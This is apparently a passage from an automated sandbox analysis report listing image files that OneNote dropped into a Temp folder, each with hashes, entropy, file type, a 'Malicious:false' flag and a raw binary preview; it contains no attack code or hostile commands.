                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                  C:\Users\user\AppData\Local\Temp\{259E9E82-FB30-4ADD-9654-1951C8947C8A}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):59832
                                                                                                  Entropy (8bit):7.308211468398169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                  MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                  SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                  SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                  SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

                                                                                                  C:\Users\user\AppData\Local\Temp\{25A0C9CB-5F31-4C14-B812-2BD6973450E9}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8184
                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                  C:\Users\user\AppData\Local\Temp\{25F3C49F-CCF8-471F-81EC-F1FEC618FB70}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{265E98C6-8131-4205-A96B-3C8B0E35EE09}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3679
                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                  C:\Users\user\AppData\Local\Temp\{26EDF2E9-9FE8-4FA1-8BF0-C54E568070F9}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2332
                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                  C:\Users\user\AppData\Local\Temp\{28767BD3-C322-4DFE-8781-36C277541971}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{28996B75-F002-4D09-A524-77B12425091B}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1570
                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                  C:\Users\user\AppData\Local\Temp\{2980CBDA-3388-43D6-A4CB-25CF3B5C5D4E}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3679
                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                  C:\Users\user\AppData\Local\Temp\{2A6C8241-7A09-4842-B210-461D00AD3657}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7374
                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                  C:\Users\user\AppData\Local\Temp\{2B72AF08-3C39-4660-A9DB-3F0847E3BC15}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13737
                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                  C:\Users\user\AppData\Local\Temp\{2E3F8243-2C01-46AC-83D9-5A34660A4CF5}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14553
                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                  C:\Users\user\AppData\Local\Temp\{2E8E7BD6-26B9-4372-B1B9-E719B1F177B2}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5386
                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                  C:\Users\user\AppData\Local\Temp\{2EA3036A-E031-4C50-B16B-B61C4FCF8E2B}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32656
                                                                                                  Entropy (8bit):3.9517299510231485
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                  MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                  SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                  SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                  SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                  Malicious:false
